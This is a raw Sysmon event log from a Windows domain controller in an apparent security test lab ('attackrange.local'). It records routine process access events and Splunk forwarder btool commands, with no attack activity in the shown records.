15:53:02.611{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005441Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005440Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005439Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CDE-5FA1-1E01-000000008801}3928C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005438Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7CDA-5FA1-1401-000000008801}39961356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CDE-5FA1-1E01-000000008801}3928C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005437Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.624{D28789B6-7CDE-5FA1-1E01-000000008801}3928C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-1401-000000008801}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000005649Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDF-5FA1-2C01-000000008801}4992C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005648Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005647Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005646Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005645Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005644Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005643Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005642Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005641Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005640Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CDF-5FA1-2C01-000000008801}4992C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005639Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005638Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7CDF-5FA1-2B01-000000008801}2716732C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CDF-5FA1-2C01-000000008801}4992C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005637Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.937{D28789B6-7CDF-5FA1-2C01-000000008801}4992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CDF-5FA1-2B01-000000008801}2716C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000005636Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDF-5FA1-2B01-000000008801}2716C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005635Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005634Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005633Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005632Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005631Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005630Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005629Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005628Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 